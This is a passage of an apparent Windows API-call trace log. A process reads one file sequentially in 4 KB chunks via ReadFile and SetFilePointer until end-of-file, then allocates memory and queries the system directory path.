	[0044.755] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.756] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x10000
	[0044.756] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.756] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x11000
	[0044.756] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.756] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x12000
	[0044.756] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.756] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x13000
	[0044.756] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.757] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x14000
	[0044.757] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.757] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x15000
	[0044.757] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.757] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x16000
	[0044.757] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.757] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x17000
	[0044.757] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.758] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x18000
	[0044.758] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.758] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x19000
	[0044.758] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.758] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1a000
	[0044.758] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.758] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1b000
	[0044.758] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.758] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1c000
	[0044.758] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.759] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1d000
	[0044.759] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.759] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1e000
	[0044.759] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.759] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x1f000
	[0044.759] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.759] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x20000
	[0044.759] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.760] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x21000
	[0044.760] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.760] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x22000
	[0044.760] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.760] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x23000
	[0044.760] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.760] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x24000
	[0044.760] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.760] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x25000
	[0044.760] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.761] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x26000
	[0044.761] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.761] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x27000
	[0044.761] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.761] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x28000
	[0044.761] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.761] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x29000
	[0044.761] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.762] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2a000
	[0044.762] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.762] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2b000
	[0044.762] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.762] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2c000
	[0044.762] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.762] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2d000
	[0044.762] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.763] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2e000
	[0044.763] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.763] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x2f000
	[0044.763] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.763] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x30000
	[0044.763] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.763] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x31000
	[0044.804] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.804] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x32000
	[0044.804] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.805] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x33000
	[0044.805] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.805] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x34000
	[0044.805] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.805] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x35000
	[0044.805] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.805] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x36000
	[0044.805] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.805] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x37000
	[0044.806] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.806] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x38000
	[0044.806] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.806] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x39000
	[0044.806] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.806] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3a000
	[0044.806] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.806] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3b000
	[0044.806] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.807] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3c000
	[0044.807] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.807] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3d000
	[0044.807] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.807] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3e000
	[0044.807] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.807] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x3f000
	[0044.807] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.807] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x40000
	[0044.807] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.808] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x41000
	[0044.808] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.808] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x42000
	[0044.808] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.808] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x43000
	[0044.808] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0044.808] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x44000
	[0044.808] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x1c4, lpOverlapped=0x0) returned 1
	[0044.808] SetFilePointer (in: hFile=0x3d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x184b47cf18*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x184b47cf18*=0) returned 0x441c4
	[0044.808] ReadFile (in: hFile=0x3d8, lpBuffer=0x15047405bf8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184b47cf98, lpOverlapped=0x0 | out: lpBuffer=0x15047405bf8*, lpNumberOfBytesRead=0x184b47cf98*=0x0, lpOverlapped=0x0) returned 1
	[0044.817] CoTaskMemAlloc (cb=0x20c) returned 0x1505f3b6bb0
	[0044.817] GetSystemDirectoryW (in: lpBuffer=0x1505f3b6bb0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
